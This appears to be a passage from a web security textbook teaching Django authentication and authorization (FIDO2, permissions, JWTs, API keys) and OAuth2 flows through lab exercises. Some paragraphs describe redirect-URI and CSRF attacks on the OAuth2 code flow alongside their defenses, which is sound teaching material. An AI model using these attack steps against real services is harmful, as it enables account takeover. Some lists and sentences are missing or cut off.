the address you would type into the browser is
https://localhost:9000
https://mac1.home:8100
path('auth/login',auth.loginView,name="login"),
LOGIN_URL="/auth/login"
Log in using the superuser username and password you created earlier. So
far, MFA has not been set up, so you will be logged in and presented with the
screen shown in Figure 10-9 (defined in the home.html template). Now click
on the username in the top-right corner (in our case, this is admin) and select
Security from the pop-up menu. You will see a screen similar to Figure 10-10.
Click on the arrow on the Add Method button and select FIDO2 Security Key.
mfa/templates/FIDO2/Add.html
There is a button in this page called Start that begins the registration with the
Authenticator. It calls the JavaScript function begin_reg(). Take a look at the
code. It makes a REST API call to fido2_begin_reg on the Server. This is
Step 1 in Figure 10-6. The Server’s response (Step 2) is a CBOR object, which
is decoded before constructing the WebAuthn call to the Authenticator.
The WebAuthn call to the Authenticator (Step 3 in the diagram) is the line
return navigator.credentials.create(options);
Click on the Start button to initiate this sequence. The biometric Authenticator
on your device will ask you for permission to use your fingerprint or face. If
you agree and proceed, it will use this to verify you, construct a public/private
key pair, and return the attestation object to the JavaScript client (Steps 4 and
5 in the diagram). Finally, on success, the Client makes the REST call
fido2_complete_reg to complete the registration (Step 7).
Now log out from the admin account and log in again. This time, after the
Server authenticates your username and password, the Client will request
permission to start the biometric authentication process, as in Figure 10-11.
The HTML template is
mfa/templates/recheck.html
and the JavaScript function is authen(). Step 1 in Figure 10-7 is the REST
API call to fido2_begin_auth in this function, and its response is Step 2.
The Client initiates authentication on the Authenticator with the WebAuthn
function:
return navigator.credentials.get(options)
Click on the Authenticate button. Your device should prompt you for permission
to use your fingerprint or face for authentication. On an iPhone, you will have
two options: the first is blank, and the second is for Account from secret key.
Choose the first. The second option is for an external key device which we are
not using.
Your device will capture your fingerprint or face (Step 4) to verify your identity
and send back the signed assertion (Step 5). If this succeeds, the Client will
send the signed assertion to the Server with the fido2_complete_auth
REST API call. If validation of this on the Server is successful (Step 7), you will
be redirected to the home page.
deactivate
10.6 Role-Based Authorization
We now turn our attention from authentication to authorization:
determining what a user has permission to do, once they have logged in.
In role-based authorization, permissions are associated with roles,
and users are assigned those roles. The role may be a property on the user
table, in which case the relationship between a role and user is one to one.
Alternatively, you may assign roles in a many-to-many relationship, as
shown in the relationship diagram in Figure 10-12.
Once a role model is defined, you can conditionally allow or disallow
functionality based on the logged-in user’s membership of a role. For
example, you can create a role called admin. If a logged-in user attempts to
access the administration pages of a web app, you can check if the user is a
member of the admin role and return 200 OK or 403 Forbidden accordingly.
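The check described above can be sketched without any framework. The User class and the admin_page_status function below are hypothetical names used only for illustration. They assume roles are held as a set on the user object, which corresponds to the many-to-many model.

```python
from dataclasses import dataclass, field
from typing import Set


@dataclass
class User:
    """A logged-in user with zero or more roles (many-to-many model)."""
    username: str
    roles: Set[str] = field(default_factory=set)


def admin_page_status(user: User) -> int:
    """Return the HTTP status for a request to the administration pages."""
    # 200 OK for members of the admin role, 403 Forbidden for everyone else.
    return 200 if "admin" in user.roles else 403
```

For example, admin_page_status(User("alice", {"admin"})) evaluates to 200, whereas a user with no roles receives 403.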
Complex applications may need a more complex authorization
model. For example, you may have different levels of membership such
as Basic, Pro, and Enterprise. You may want those three groups to have
access to different components of the application. It is error-prone to
assign permissions to individual users. Instead, we can assign users to
groups and associate permission with groups rather than users, as shown
in Figure 10-13. Using this model, you can change what roles a Pro user
has access to, for example, without having to create a new association for
every user.
appname.action_model
def myview(request):
    if request.user.has_perm('coffeeshop.add_user'):
        # do something
        ...
    else:
        # do something else
        ...
This works both when the user has the permission and when the user
is a member of a group that has the permission.
As an alternative, you can use the @permission_required decorator,
for example:
from django.contrib.auth.decorators import permission_required

@permission_required('coffeeshop.add_user')
def myview(request):
    # code only executed by a user with the permission
    ...
If the view is called by a user who does not have the named
permission, they are redirected to the login page. You can change the login
page by adding it as a parameter:
@permission_required('coffeeshop.add_user', login_url='/myloginpage/')
...
AUTHORIZATION IN DJANGO
Let’s change the Coffeeshop so that Alice can create comments on products
but Bob can’t. To do this, we must
First, we’ll make the addcomment view only accessible to users with the
coffeeshop.add_comment permission (which Django automatically creates
from the Comment model in models.py). Open the file
coffeeshopsite/coffeeshop/views.py
Find the addcomment() function and add the decorator
@permission_required('coffeeshop.add_comment')
before it.
To remove the comment button from users who do not have permission, open
the file
coffeeshopsite/coffeeshop/templates/coffeeshop/product.html
<button type="submit" class="btn">Comment</button>
{% if perms.coffeeshop.add_comment %}
<button type="submit" class="btn">Comment</button>
{% endif %}
Log in as alice and visit a product page (e.g., click on Java). You should find
that the comments section is there but not the button to add a new one.
Now, we need to add the permission to Alice’s account. Log out, and then
visit the URL
http://10.50.0.2/admin/
Figure 10-15. The Django Admin Console with the Users link
highlighted
Click Users (the link highlighted in the figure) and then click alice. Scroll
down to the User permissions section. Click coffeeshop | comment | Can
add comment and the right arrow to activate it for Alice. It should look like
Figure 10-16. Click the Save button at the bottom.
Now log out, log in again as alice, and visit a product page again. The
Comment button should be visible again.
{
    "alg": "algorithm",
    "typ": "JWT"
}
The algorithm value denotes the algorithm used for the signature.
HMAC with SHA (HS256, HS384, etc.) and RSA with SHA (RS256, RS384,
etc.) are common choices. The header is then Base64Url-encoded. This is
identical to Base64 encoding but with - in place of +, _ in place of /, and
the trailing padding character, =, either omitted or URL-encoded.
These changes make Base64 compatible with URL syntax.
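The encoding just described is available in Python's standard library. The following sketch shows one way to encode and decode with the padding omitted. The helper names b64url_encode and b64url_decode are our own, and we assume HS256 as the algorithm purely for the example header.

```python
import base64
import json


def b64url_encode(data: bytes) -> str:
    """Base64Url-encode, omitting the trailing = padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Decode Base64Url text, restoring any padding that was omitted."""
    padding = "=" * (-len(text) % 4)
    return base64.urlsafe_b64decode(text + padding)


# Encode a JWT header, serialized compactly (no spaces).
header = {"alg": "HS256", "typ": "JWT"}
encoded_header = b64url_encode(
    json.dumps(header, separators=(",", ":")).encode("utf-8")
)
```

The decoder has to add the padding back because Python's decoder expects the input length to be a multiple of four.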
The payload consists of claims, also as JSON. Claims are statements
about an entity such as a user. There are three types of claim:
1. Registered claims: Predefined claims defined in the
JWT standard. Common registered claims are as
follows:
• sub: The subject, such as the username
11
www.iana.org/assignments/jwt/jwt.xhtml
An example payload is
{
    "sub": "alice",
    "exp": 1672531199,
    "name": "Alice Adams",
    "type": "member"
}
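To show how a payload like this becomes a signed token, here is a minimal sketch using HMAC with SHA-256 (HS256) and only the standard library. The function names sign_jwt and verify_jwt are hypothetical, and the sketch assumes the usual compact form of three Base64Url-encoded parts joined by dots. A production application would normally use a maintained JWT library instead.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(payload: dict, key: bytes) -> str:
    """Build header.payload.signature, signed with HS256."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [_b64url(json.dumps(part, separators=(",", ":")).encode("utf-8"))
             for part in (header, payload)]
    signing_input = ".".join(parts).encode("ascii")
    signature = hmac.new(key, signing_input, hashlib.sha256).digest()
    return ".".join(parts + [_b64url(signature)])


def verify_jwt(token: str, key: bytes, now: float) -> Optional[dict]:
    """Return the claims if the signature and expiry are valid, else None."""
    try:
        header_b64, payload_b64, signature_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        # Only accept the algorithm we sign with.
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(signature_b64)):
            return None
        payload = json.loads(_b64url_decode(payload_b64))
    except ValueError:
        return None
    # Reject tokens with a missing or past exp claim.
    if not isinstance(payload, dict) or payload.get("exp", 0) < now:
        return None
    return payload
```

The signature is checked before the payload is parsed, so claims from a tampered token are never trusted.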
Revoking JWTs
An advantage of JWTs is that the server does not have to query a database
to determine if a user is authorized. It does not even need to store session
state as all the data it needs to determine the user’s credentials are in the
JWT and signed by its own key. This makes them useful for single-page
web applications that make extensive use of API calls.
However, if no server-side state is stored, the JWT authorization cannot
be revoked. One solution to this is to make the expiry short, typically a few
minutes, and also issue a refresh token. This is also a JWT but with a longer
expiry, say, a month or more. The client sends the JWT authorization
token in requests to the server until it reaches expiry. When that happens,
it sends the refresh token instead. If a refresh token has been revoked, it
is recorded in a special table. When the server receives the token from the
We will revisit JWTs in the next chapter when we look at the OAuth2
protocol. We will also do an exercise with them.
10.8 API Keys
API keys are a way of controlling access to APIs from clients. We saw in
Section 10.2 that form-based authentication with session IDs is inconvenient
for REST APIs as the client has to handle redirects to an HTML form if the
session ID has expired. An alternative is to always send a username and
password with each request. However, this means the password must be
stored by any application making the REST API calls. Not only is this risky
for the account owner, but it may grant more permissions than the client
actually needs. For example, we may want an application to have read-only
access to resources the user normally has read-write access to.
API keys are designed to address these issues. A user or developer
creates an API key for the application they want the REST API to access
on their behalf. The developer of the REST API can allow the user to select
from a number of roles, for example, read-only vs. read-write. To access the
API, the newly created key is sent instead of the user’s password.
Imagine a user, Alice, has an account with a service, weatherfor.com,
that provides an API to get weather forecasts. The API call
https://weatherfor.com/api/forecast/New+York
returns a JSON string with the current forecast for New York. Alice
wants to develop an application that uses this API. She visits weatherfor.
com, logs in, and goes to the page where she can create API keys.
The weatherfor.com site will ask Alice to enter an application name
which she can use later to refer to her new API key. It will create her a
cryptographically secure code. This may be a random string. Alternatively,
like Django session IDs, it may be information about the user and/or
application signed with a secret key.
The server displays the new API key so that Alice can copy it into her
application. It also stores it in a table associated with Alice’s ID. When Alice
uses the key in her application, weatherfor.com can determine which user
it belongs to and whether that user is authorized to access the API.
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': [
        'rest_framework.permissions.IsAuthenticated',
    ]
}
REST_FRAMEWORK = {
    "DEFAULT_PERMISSION_CLASSES": [
        "rest_framework_api_key.permissions.HasAPIKey",
    ]
}
Alternatively, the authentication method can be set per view. For class-
based views, you can use the permission_classes class variable:
class MyView(APIView):
    permission_classes = [HasAPIKey]
    ...
For function-based views, use the @permission_classes decorator:
@api_view(['GET'])
@permission_classes([HasAPIKey])
def my_view(request):
    ...
Let’s add a new API call that will be accessed with an API key. To keep the
coding simple, we will use the ModelViewSet, like we already have for the
Address model. We will make a view set for the Product table. However, we
will use the ReadOnlyModelViewSet to only create the GET views.
The code for this exercise is in the snippets/apikeys directory.
The first step is to install the Django REST Framework API Key package with
However, this has already been done during the VM installation. We do need
to add it as an app. Edit the settings.py file and add it to the INSTALLED_APPS
variable:
INSTALLED_APPS = [
    ...
    'rest_framework',
    'rest_framework_api_key',
    ...
]
coffeeshopsite/coffeeshop/serializers.py
class ProductSerializer(serializers.ModelSerializer):
    class Meta:
        model = Product
        fields = ['pk', 'name', 'description', 'unit_price']
Now edit
coffeeshopsite/coffeeshop/views.py
and add the new view set. We will keep the default global permissions class
and set this view set to use HasAPIKey
coffeeshopsite/coffeeshop/urls.py
under
router.register(r'addresses', views.AddressViewSet, basename="addresses")
router.register(r'products', views.ProductViewSet, basename="products")
Finally, restart Apache to pick up the code and database schema changes:
sudo apachectl restart
http://10.50.0.2/admin/
and log in as admin. You will notice a new section to manipulate the APIKey
model. Click on the + Add link, as shown in Figure 10-18, to add a new
API key. Enter a name for the key. Anything will do, but we have entered
myclient. After clicking the Save button, the page will print a confirmation,
as shown in Figure 10-19, with the value of the new key. Save the key to a text
file somewhere as Django does not store it as cleartext. If you lose it, you will
have to delete it and create another.
Return to a Bash shell in the Vagrant VM (or on your host device if Curl is
installed) and enter the command
curl http://10.50.0.2/api/products/
The JSON response should tell you that you have not provided credentials.
Now enter
Note that this package uses the Api-Key scheme instead of the more
conventional Bearer. This can, however, be changed in configuration.
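For clients written in Python rather than called from Curl, the same request can be built with the standard library. This is a minimal sketch assuming the package's default Authorization header with the Api-Key scheme. The function name products_request is our own, and the base URL is the Coffeeshop VM address used in this exercise.

```python
import urllib.request


def products_request(api_key: str,
                     base_url: str = "http://10.50.0.2") -> urllib.request.Request:
    """Build a GET request for the products API that carries the API key."""
    return urllib.request.Request(
        f"{base_url}/api/products/",
        # The scheme is Api-Key rather than the more conventional Bearer.
        headers={"Authorization": f"Api-Key {api_key}"},
    )
```

Passing the result to urllib.request.urlopen() sends the request. Without a valid key the server is expected to reject it, as it did for the Curl command without credentials.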
Figure 10-18. The Django Admin Console after adding the API Keys
module. The Add Key button is highlighted
10.9 Summary
In this chapter, we looked at different methods for authentication
and authorization. The most common method of authentication is
username and password, either requested by the web server using
HTTP Basic authentication or by the application with form-based
authentication. However, other methods such as one-time passwords and
biometric authentication are gaining wider use, especially in two-factor
authentication models.
Authorization is the process of determining what permissions a user
has. Role-based authorization is popular, but JSON Web Tokens (JWTs) and
API keys are also widely used.
OAuth2 is a protocol for standardizing authorization, especially
between applications where there is differing trust. It also supports
authentication in one use case. We will look at these in the next chapter.
CHAPTER 11
OAuth2
In the last chapter, we looked at authentication and authorization. A
widely used authorization protocol is OAuth2. It is a large topic with many
use cases and options, so we have given it its own chapter.
OAuth2 is defined in RFC 6749 [10]. It separates the roles of the client
and the authorization provider. In this way, authentication can be performed
exclusively by the service where the user is registered, without having to
share the user’s credentials.
As an example, imagine we want users of our Coffeeshop to be able to
automatically send a Facebook post when they buy our coffee. Facebook
provides an API for sending posts, but we need access to the user’s
Facebook account. We could ask the user to enter their username and
password and store these in our database. However, many users would
consider this a security risk, and justifiably so. Users do not want to give
applications access to their accounts on other services, especially ones
that contain private data. Facebook also does not want its customers’
credentials stored by potentially untrustworthy third-party applications.
OAuth2 provides a solution. Facebook defines roles that have limited
access to the user’s account, for example, being able to create posts but
not read them or read the address book. Our Coffeeshop asks Facebook
for permission to access the user’s account, with just that permission.
Facebook, not Coffeeshop, asks the user for their credentials.
OAuth2 has further use cases. For example, some services require
access to an API but not necessarily an individual user’s account. OAuth2
also provides authentication for one limited use case.
In this chapter, we will look at various ways OAuth2 can be used. We
will look at how the protocol works in each case, and we will do some
hands-on exercises using the Coffeeshop VMs.
We will also look at OpenID Connect (OIDC), a protocol for federated
authentication built on top of OAuth2.
Before continuing, we should briefly mention OAuth1. It was
developed with similar goals. However, OAuth2 is a rewrite rather than an
evolution of OAuth1, which, in hindsight, was considered difficult to use as
well as limiting. It has fallen out of use, and the terms OAuth and OAuth2
are used synonymously.
11.1 OAuth2 Terminology
OAuth2 defines four roles. These are the participants of the protocol
exchange, not the set of permissions the user or application has (which
OAuth2 refers to as scope). The roles are as follows:
Each flow makes use of certain data types sent between the client and
authorization server. The flows follow a common pattern, and the same
types of data occur in more than one flow. They are as follows:
The flow begins when the client wants permission to access resources
on behalf of the resource owner. In our example, this is to send a post on
behalf of the user. The resource owner initiates a GET request to the client
by clicking on a link on the client’s page. The client sends a redirect to the
/authorize endpoint on the authorization server, making a GET request
with the following as query parameters:
• Client ID
• Redirect URI
• Scope
• State
Note that the request originates from the resource owner clicking a link
in their browser, not from the client back end. This is important because the
resource owner will later be asked to grant permission via a page in the browser.
The client must be preregistered with the authorization server. The
latter will have issued the former with a client ID and a client secret. When
registering the client, one or more redirect URIs must also be provided.
The redirect URI in the authorization request must be from this list.
The state is a random string. It is not used by the authorization
server but is returned by it to the client so that the client can confirm it
corresponds to the same request that it made (we will see why later).
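The authorization request and the later state check can be sketched as follows. The function names are hypothetical. The response_type=code parameter is the value used for the authorization code flow, and the client is assumed to keep the generated state (for example, in the user's session) until the redirect comes back.

```python
import hmac
import secrets
from typing import Tuple
from urllib.parse import urlencode


def build_authorize_url(authorize_endpoint: str, client_id: str,
                        redirect_uri: str, scope: str) -> Tuple[str, str]:
    """Return the URL to redirect the browser to, plus the state to remember."""
    state = secrets.token_urlsafe(16)  # random and unguessable
    query = urlencode({
        "response_type": "code",
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "scope": scope,
        "state": state,
    })
    return f"{authorize_endpoint}?{query}", state


def state_matches(expected_state: str, returned_state: str) -> bool:
    """Check that the state returned to the redirect URI is the one we sent."""
    return hmac.compare_digest(expected_state.encode("utf-8"),
                               returned_state.encode("utf-8"))
```

If state_matches() returns False, the client should abandon the flow rather than exchange the authorization code.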
In Chapter 7, we learned that confidential data should not be passed
in GET requests. Note that none of the aforementioned is confidential. The
client secret is not passed in this step.
When the authorization server receives this request, one of two things
will happen. If a user is logged in (i.e., if a session ID was sent in a cookie),
that user will be identified, and the authorization server will proceed to
the next step. If not, it first prompts the user to sign in. Once the user has
signed in, the authorization server will ask the user if they are willing to
grant the client access to the requested scope. In the figure, the application is called
AppName. This is the name that was registered to receive the client ID.
Notice that the user’s ID was not sent. The client does not have to know
the ID of the user on the authorization server. It only has a client ID, which
is associated with the application, not the user.
If the user grants access, the authorization server redirects the user to
the redirect URI that was provided in the preceding GET request. This has
to have been registered with the authorization server to prevent attacks.
We will see an example soon.
• Client ID
• Client secret
• Redirect URI
If the data are all valid, the authorization server responds with a
JSON string:
{
    "access_token": "<ACCESS_TOKEN>",
    "refresh_token": "<REFRESH_TOKEN>",
    "token_type": "Bearer",
    "expires_in": "<SECONDS>"
}
The client can now use the access token to request resources on the
resource server, passing the access token in the Authorization: Bearer
header. The access and refresh tokens should be kept confidential as they
grant users access to resources on the server.
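As a sketch of how a client might use the token response, the following function parses the JSON and builds a request to the resource server with the Authorization: Bearer header. The function name bearer_request is our own, and the URL passed in is whatever resource the client wants to access.

```python
import json
import urllib.request


def bearer_request(url: str, token_response_json: str) -> urllib.request.Request:
    """Build a request to the resource server using the issued access token."""
    tokens = json.loads(token_response_json)
    # Only the Bearer token type is handled in this sketch.
    if str(tokens.get("token_type", "")).lower() != "bearer":
        raise ValueError("unsupported token type")
    return urllib.request.Request(
        url,
        headers={"Authorization": f"Bearer {tokens['access_token']}"},
    )
```

The tokens should be held only in memory or in protected storage on the client, since anyone who obtains them can make the same request.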
How the resource server validates the access token is not defined
by the OAuth2 standard. One common way is for the resource server
and the authorization server to share a database in which the access
token is stored. Another option is for the access token to be a JWT, which
the resource server can validate by having the authorization server’s
public key.
and initiates the flow to obtain an authorization code (step 1). This is to
ensure he gets a state parameter generated by the client. He intercepts the
GET request and replaces the legitimate request URI with one to his own
malicious server. He sends this link to the victim, Alice, and tricks her into
clicking on it (step 2).
Alice follows the link (step 3) and is taken to the authorization server,
where she grants permission (step 4). As her link has an altered request
URI, she is redirected to Bob’s malicious site (step 5). Bob captures the
authorization code created for Alice’s account (step 6). He creates a GET
request to the client at step 7 (what would have been step 2 in Figure 11-1) with
The client now completes the authorization flow by sending the POST
request to the authorization server (step 8), which sends the access token
back to the client (step 9). Bob’s account at the client is now authorized to
access Alice’s account on the authorization server.
Figure 11-3. The CSRF attack on the OAuth2 authorization code flow
The authorization server sends the redirect response to the request URI in
step 3. Rather than letting his browser follow the redirect, Bob intercepts
it and copies the URI, including the authorization code that was issued to
him (step 4).
Bob sends the URI with his authorization code to the victim, Alice, and
tricks her into clicking on it (step 5). The authorization server has already
authenticated Bob, and he has already granted the client access to his
account. Therefore, Alice will not see a dialog asking her for authorization.
When she clicks on it, she is taken to the client’s redirect URI (step 6),
which makes a POST request to the authorization server (step 7). The
authorization code is valid, so the authorization server creates an access
token and returns it to the client in step 8. However, this is to access Bob’s
account. Bob has connected Alice’s client account to Bob’s account on the
authorization server.
Other Attacks
Other potential attacks include clickjacking, which is prevented by the
X-Frame-Options header, as we saw in Section 8.3, and code injection. We
looked at this in Section 7.3. The defenses are the same.
For other possible attacks, see Chapter 10 of the RFC [10].
The Django OAuth Toolkit package, which would ordinarily be installed with
• Client: CSThirdparty
Rather than implementing all the calls in the client, we will perform most of
them by hand, with either the browser or Curl. This will make it easier to follow
how the flow works.
INSTALLED_APPS = (
    ...
    'oauth2_provider',
)
Also add the following configuration at the end of the settings.py file:
# OAuth Settings
OAUTH2_PROVIDER = {
    "PKCE_REQUIRED": False
}
This turns off PKCE, which is on by default (we will look at PKCE later).
This app provides a number of URLs, which we include with the following
change in coffeeshopsite/coffeeshop/urls.py:
urlpatterns = (
    ...
    path('oauth/', include('oauth2_provider.urls', namespace='oauth2_provider')),
)
The URLs we added previously are for the authorization server. In order to
try out OAuth2, we need at least one API call on the resource server that is
available only with an OAuth2 access token. The Django OAuth Toolkit provides
support. We will add a simple API call to
coffeeshopsite/coffeeshop/views.py
urlpatterns = (
    ...
    path('oauth/', include('oauth2_provider.urls', namespace='oauth2_provider')),
    path('oauthapi/hello', views.OAuthResource.as_view()),
)
sudo apachectl restart
You can confirm you do not have permission to access the preceding endpoint
with the following command:
curl -I http://10.50.0.2/oauthapi/hello
http://10.50.0.2/admin/
http://10.50.0.2/oauth/applications/register/
Before clicking the Save button, note down the client ID and client secret.
Django only stores the client secret in hashed form, so if you don’t save it on
this screen, you will be unable to retrieve it. Note that after you click Save,
Django will display a client secret on the screen. This, however, is the hashed
secret; you need to save the unhashed secret which is only displayed before
you click Save.
After you have noted the client ID and secret, click the Save button.
http://10.50.0.2/
We are going to play the part of the CSThirdparty app requesting access to
Bob’s account by issuing each request manually, either in the web browser or
with Curl. Enter the following URL into a browser:
http://10.50.0.2/oauth/authorize/?
response_type=code&client_id=YOUR_CLIENT_ID
&redirect_uri=http://10.50.0.3/oauthcallback
snippets/oauth2/auth_code/commands.txt
After entering the URL, you will see the Coffeeshop login page, unless a user is
logged in already. Log in as Bob. You will be asked to confirm access to Bob’s
Coffeeshop account with the dialog shown in Figure 11-5. We didn’t include
scope in our URL, so it defaulted to Django OAuth Toolkit’s defaults, which are
Read and Write. These are visible in the dialog.
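The authorization URL used in this step can also be assembled in code. The following is a minimal sketch using only Python's standard library; build_authorize_url is a hypothetical helper for illustration, not part of the Django OAuth Toolkit, and the client ID is a placeholder.

```python
from urllib.parse import urlencode

AUTHORIZE_ENDPOINT = "http://10.50.0.2/oauth/authorize/"


def build_authorize_url(client_id, redirect_uri, scope=None):
    """Return the URL that starts the authorization code flow."""
    params = {
        "response_type": "code",  # ask for an authorization code
        "client_id": client_id,
        "redirect_uri": redirect_uri,
    }
    if scope:
        # Omitting scope leaves the authorization server to apply its defaults.
        params["scope"] = scope
    return AUTHORIZE_ENDPOINT + "?" + urlencode(params)


url = build_authorize_url("YOUR_CLIENT_ID", "http://10.50.0.3/oauthcallback")
print(url)
```

Note that urlencode percent-encodes the redirect URI, which is the safer form when the URL is built by a program rather than typed by hand.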
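from django.http import JsonResponse

def oauthcallback(request):
    context = {}
    # Return the authorization code as JSON so it can be copied from the browser.
    return JsonResponse({'code': request.GET['code']})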
If you look at Figure 11-1 again, you will see that the GET parameters to the
redirect URI contain code. The value of this is the authorization code. We
are just returning it in a JSON string so we can capture it. Copy this code
into a file.
If you get an error saying that a code challenge is expected, check that you
selected a client type of Confidential when you registered the application. Also
check that you remembered to include the lines
# OAuth Settings
OAUTH2_PROVIDER = {
"PKCE_REQUIRED": False
}
in settings.py.
The next step in the flow is to exchange the authorization code for an access
token. We can’t do this in the browser’s address bar because it is a POST
request. Instead, we will use Curl. The command is in the commands.txt file:
curl -X POST \
    -H "Cache-Control: no-cache" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    "http://10.50.0.2/oauth/token/" \
    -d "client_id=YOUR_CLIENT_ID" \
    -d "client_secret=YOUR_CLIENT_SECRET" \
    -d "code=YOUR_AUTHORIZATION_CODE" \
    -d "redirect_uri=http://10.50.0.3/oauthcallback" \
    -d "grant_type=authorization_code"
Enter this command into the terminal, substituting your client ID and
client secret for YOUR_CLIENT_ID and YOUR_CLIENT_SECRET. Substitute
the authorization code you copied from the browser for
YOUR_AUTHORIZATION_CODE.
{"error": "invalid_grant"}
This is because the authorization code has a very short expiry. It expired in the
time it took you to enter the command. The best way to make this work is to
enter the preceding Curl command into a shell script, say, post.sh, pasting in
your client ID and your client secret. Visit the URL
http://10.50.0.2/oauth/authorize/?
response_type=code&client_id=YOUR_CLIENT_ID
&redirect_uri=http://10.50.0.3/oauthcallback
again (remember to paste in your client ID). As quickly as you can, copy the
new authorization code and paste it into your shell script. Now execute it:
bash post.sh
If you were successful, you will receive a JSON string similar to the following:
{"access_token": "i6TY0MrlxE8sgNCZuS5dMFCf0vtFqu",
"expires_in": 36000, "token_type": "Bearer",
"scope": "read write", "refresh_token":
"wZ0Ot1OW8V5buAIq0sUlV2MaViADHY"}
Don’t remove the edits we did for this exercise. We will build on them in the
next one.
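For comparison, the Curl command from this exercise could be expressed in Python roughly as follows. This is a sketch only: build_token_request is a hypothetical helper, the credentials are placeholders, and the request is built but deliberately not sent.

```python
from urllib.parse import urlencode
from urllib.request import Request

TOKEN_ENDPOINT = "http://10.50.0.2/oauth/token/"


def build_token_request(client_id, client_secret, code, redirect_uri):
    """Build (but do not send) the POST that exchanges a code for a token."""
    form = {
        "client_id": client_id,
        "client_secret": client_secret,
        "code": code,
        "redirect_uri": redirect_uri,
        "grant_type": "authorization_code",
    }
    return Request(
        TOKEN_ENDPOINT,
        data=urlencode(form).encode("ascii"),
        headers={
            "Cache-Control": "no-cache",
            "Content-Type": "application/x-www-form-urlencoded",
        },
        method="POST",
    )


req = build_token_request(
    "YOUR_CLIENT_ID",
    "YOUR_CLIENT_SECRET",
    "YOUR_AUTHORIZATION_CODE",
    "http://10.50.0.3/oauthcallback",
)
print(req.get_method(), req.full_url)
# Passing req to urllib.request.urlopen() would send it.
```

Because the authorization code expires quickly, a real client would make this call immediately after receiving the code at its callback.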
11.3 Implicit Flow
For the authorization code flow to be secure, the client secret needs
to be secret. The flow is designed for server-rendered pages. In these
applications, the client secret is not sent to the browser, thus avoiding
disclosure.
However, disclosing the client secret cannot be avoided in client-
rendered JavaScript applications. The implicit flow was designed for this
purpose. We describe it briefly here; however, it has been deprecated in
favor of the more secure authorization code with PKCE flow. The implicit
flow is illustrated in Figure 11-6.
The resource owner initiates the flow in the same way as for the
authorization code flow. Again, the client’s redirect is to the /authorize
endpoint on the authorization server but this time with a response type of
token. Rather than issuing an authorization code, the authorization server
responds with a redirect containing the access token. However, it is given
in the page fragment (after a #) instead of as a query parameter (after a ?).
The rationale was to allow the browser to read the access token while
preventing the browser from sending it back in a request. Older browsers
could manipulate the page fragment to extract the access token. However,
they could not manipulate the full path without triggering a page reload.
Old browsers also had a limitation of only being able to send JavaScript
requests to the same origin. The POST request in the authorization code flow
needs to be sent from the client page to the authorization server. Neither of
these limitations now holds, the former because of the History API and the
latter because of CORS.
The implicit flow is now considered insecure because the access token
is returned in the redirect URL, where it can leak through the browser
history or be read by any script running on the page. This is addressed by
the authorization code with PKCE flow.
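The difference between the page fragment and the query string can be seen by splitting a URL. The sketch below uses Python's urllib.parse; the redirect URL and token value are invented for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Hypothetical redirect produced by an implicit-flow authorization server.
redirect = "http://10.50.0.3/oauthcallback#access_token=EXAMPLE_TOKEN&token_type=Bearer"

parts = urlsplit(redirect)
query_params = parse_qs(parts.query)        # the part a server would receive
fragment_params = parse_qs(parts.fragment)  # the part that stays in the browser

print(query_params)
print(fragment_params["access_token"][0])
```

The query string is empty, so nothing about the token reaches the server hosting the callback page; the token is only available to code running in the browser.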
authorization code flow, the state prevents the client from exchanging
an authorization code created by a different client instance for an access
token. Preregistering the redirect URI prevents the same authorization
code Redirect URI Manipulation attack described in the previous section.
The rest of the flow is the same as the standard authorization code
flow. If the rehashed code verifier matches the code challenge, the
authorization server responds with an access token that can then be used
to access resources on the resource server.
11.5 Password Flow
The password flow is the only flow that performs authentication as well
as authorization. The client asks for a username and password on behalf
of the authorization server. It should therefore only be used in situations
where there is strong trust between the two, for example, where they are
part of the same application.
The flow is illustrated in Figure 11-8. When it is initiated, a form is
presented to the resource owner prompting for a username and password.
These are sent to the authorization server’s /token endpoint, along with
the client ID. An additional client secret is optional and, of course, should
only be used where the POST call is made from the back end, not a front-
end JavaScript application. The grant type is password.
11.7 Device Flow
The device flow is intended for authorizing clients that have limited input
capabilities, such as a Smart TV, to use the resource owner’s account. The
request for permission is displayed on a separate device that does have
input capabilities.
If you have used YouTube on an Apple TV, you will have seen this flow.
The client (Apple TV in this case) displays a URL and a code. The resource
owner visits that URL on a different device, for example, a smartphone,
and enters the code to grant access.
The full flow is illustrated in Figure 11-10. We have shown the device
as a Smart TV and the additional device as a smartphone. The flow starts
when the client makes a POST request to the /token endpoint on the
authorization server, passing the client ID and requesting a response type
of device_code. The device code identifies that particular device and is
issued by the authorization server. It is returned to the client in a JSON
string, along with a user code, verification URI, interval, and expiry time.
The client displays the verification URI so that the resource owner
can visit it on the additional device. It also displays the user code. The
resource owner visits the verification URI on their separate device. A page
is displayed prompting them for the user code. When they enter it, a POST
{"error": "authorization_pending"}
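The client's side of the device flow amounts to a polling loop driven by the interval and expiry time it was given. The following is a sketch under stated assumptions: request_token is a caller-supplied function standing in for the real POST to the token endpoint, and returning an expired_token error from the loop itself is a choice made for this example.

```python
import time


def poll_for_token(request_token, interval, expires_in, sleep=time.sleep):
    """Poll until the user approves, an error occurs, or the code expires.

    request_token is a hypothetical callable that performs one POST to the
    token endpoint and returns the decoded JSON response as a dict.
    """
    waited = 0
    while waited < expires_in:
        response = request_token()
        if response.get("error") == "authorization_pending":
            # The resource owner has not entered the user code yet.
            sleep(interval)
            waited += interval
            continue
        return response  # an access token, or a different error
    return {"error": "expired_token"}


# Simulated authorization server: pending twice, then success.
replies = iter([
    {"error": "authorization_pending"},
    {"error": "authorization_pending"},
    {"access_token": "EXAMPLE_TOKEN", "token_type": "Bearer"},
])
result = poll_for_token(lambda: next(replies), interval=5, expires_in=60,
                        sleep=lambda seconds: None)
print(result)
```

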